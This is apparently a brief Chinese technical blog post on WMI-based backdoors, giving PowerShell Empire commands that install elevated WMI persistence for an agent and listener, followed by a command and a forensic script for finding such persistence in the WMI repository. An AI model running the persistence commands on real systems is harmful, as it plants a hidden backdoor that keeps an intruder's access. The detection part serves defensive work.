Empire-WMI型后门

2022-09-13 09:41:06 浏览数 (1)

代码语言：javascript复制

usemodule powershell/persistence/elevated/wmi
set Agent 91AT5M4V
set Listener test
execute


检查目标主机的情况
powershell:Get-WmiObject -Namespace rootsubscription -class commandlineeventconsumer


https://github.com/davidpany/WMI_Forensics.git
WMI 存储库:%windir%System32WbemRepository---->OBJECTS.DATA

python2 PyWMIPersistenceFinder.py OBJECTS.DATA

wmi

0 人点赞